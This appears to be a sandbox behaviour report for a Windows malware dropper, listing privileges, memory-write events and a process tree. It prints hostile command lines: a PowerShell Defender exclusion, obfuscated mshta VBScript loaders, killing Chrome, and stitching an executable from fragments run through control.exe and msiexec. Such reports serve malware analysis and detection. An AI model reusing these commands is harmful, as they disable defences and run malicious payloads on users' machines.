Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2328 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe
PID 2328 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe
PID 2328 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe
PID 4160 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2408 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe
PID 2408 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe
PID 2592 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2592 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2592 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 1372 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe
PID 1372 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe
PID 1372 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe
PID 1220 wrote to memory of 4168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe
PID 1220 wrote to memory of 4168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe
PID 1220 wrote to memory of 4168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe
PID 3132 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe
PID 3132 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe

Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe

Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe

Fri20109b9e174d0fc.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe

Fri209f6924af86d795.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe

Fri20ee0a6fe195bd09.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe

Fri209d5bfbb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe

Fri20c0c46650eeb2a.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe

Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4160 -ip 4160

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe

Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe

Fri20ba391d4469.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe

Fri2002ce5f91c761.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe

Fri2050293ea5.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri200ae385720d3.exe

Fri200ae385720d3.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe

Fri208f5f140853548.exe

C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$5024C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 612

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe

"C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$301D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4168 -ip 4168

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "" == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 620

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4168 -ip 4168

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe

EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 640

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM "Fri20ba391d4469.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Fri208f5f140853548.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4168 -ip 4168

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 " == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 748

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4168 -ip 4168

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 776

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct ( "WscRiPt.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4168 -ip 4168

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 828

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\msiexec.exe

msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4168 -ip 4168

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 640

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff91260cc40,0x7ff91260cc4c,0x7ff91260cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

